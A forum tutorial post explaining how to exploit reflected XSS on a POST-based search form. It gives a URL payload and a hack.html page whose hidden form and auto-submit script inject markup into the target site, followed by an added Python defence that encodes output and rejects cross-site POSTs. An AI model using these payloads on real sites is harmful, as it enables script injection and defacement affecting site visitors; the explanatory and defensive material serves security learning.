    01-30-2014 09:44 PM XSS and post method
    XSS and post methods
    When a webpage uses the GET method to submit user input through a form, XSS is easy to trigger by constructing a URL such as http://www.xssvulnsite.com/index.asp?q="><script>alert("XSS")</script>. When a webpage uses the POST method, it is not possible to craft such a URL and use it as a link, because the page does not use the URL to send the user input to the form handler. Exploiting the XSS vulnerability is still possible, though.
    So let's suppose once more that the vulnerable site http://www.xssvulnsite.com/ uses a form to search or submit data. A very brief sketch of the HTML code:

    <form name="formX" method="post" action="/search.asp">
    <input type="text" name="search_keyword" value="">
    <input type="submit" value="submit">
    </form>
     

    To exploit the XSS vulnerability we can take an indirect route: another file is written and hosted on another page, let's say the file hack.html at http://www.redirectingpage.com/hack.html
    What are its contents?
    The hack.html file contains the following code:
    <form method="post" action="http://www.xssvulnsite.com/search.asp" name="formX">
    <input type="hidden" name="search_keyword" value='><img src="http://www.offensivephotos/offensivephoto.jpg">'>
    </form>
     
    <script>
    // Pass a function so the submit fires after the 1 ms delay instead of immediately.
    setTimeout(function () { document.formX.submit(); }, 1);
    </script>

    We can see that the redirecting form reuses the parameters of the original form: it is a hidden form whose value carries whatever we want to place in the XSS hole, such as a script to be executed, a photo or text.
    It is followed by a script that, when the intermediate page is opened, loads the XSSed vulnerable page after 1 msec.
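
Seen from the server side, the request that hack.html produces can be handled safely. This is an added example, not part of the original article or of any site's code. It assumes search.asp echoes search_keyword into its results page (the article does not show the handler); the function names and the "Results for" markup are hypothetical.

```python
import html
from urllib.parse import parse_qs, urlencode, urlsplit

SITE_ORIGIN = "http://www.xssvulnsite.com"  # the article's example site

# Constructed sample: the request a browser sends when hack.html auto-submits.
PAYLOAD = '><img src="http://www.offensivephotos/offensivephoto.jpg">'
SAMPLE_HEADERS = {"Origin": "http://www.redirectingpage.com"}
SAMPLE_BODY = urlencode({"search_keyword": PAYLOAD})

def keyword_from_body(body):
    """Decode a form-encoded POST body and return the search_keyword field."""
    return parse_qs(body, keep_blank_values=True).get("search_keyword", [""])[0]

def render_vulnerable(keyword):
    """Assumed flaw: the keyword is echoed into the page without encoding."""
    return "<p>Results for: " + keyword + "</p>"

def render_hardened(keyword):
    """Same page, with the keyword HTML-encoded before it is written out."""
    return "<p>Results for: " + html.escape(keyword, quote=True) + "</p>"

def origin_of(url):
    """Reduce an Origin or Referer value to scheme://host[:port]."""
    parts = urlsplit(url)
    return f"{parts.scheme}://{parts.netloc}".lower()

def is_cross_site_post(headers):
    """True when the POST did not come from a page on SITE_ORIGIN.
    Origin is preferred, Referer is the fallback, neither present is rejected."""
    source = headers.get("Origin") or headers.get("Referer")
    return source is None or origin_of(source) != SITE_ORIGIN

def handle_search(headers, body):
    """Hardened handler: refuse cross-site POSTs, encode what is reflected."""
    if is_cross_site_post(headers):
        return 403, "<p>Cross-site form submission rejected.</p>"
    return 200, render_hardened(keyword_from_body(body))

if __name__ == "__main__":
    print(render_vulnerable(keyword_from_body(SAMPLE_BODY)))    # markup reaches the page
    print(handle_search(SAMPLE_HEADERS, SAMPLE_BODY))           # rejected
    print(handle_search({"Origin": SITE_ORIGIN}, SAMPLE_BODY))  # encoded
```

Output encoding is the actual fix for the XSS hole; the Origin/Referer check is defence in depth against the cross-site auto-submit and may need relaxing for clients that send neither header.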
     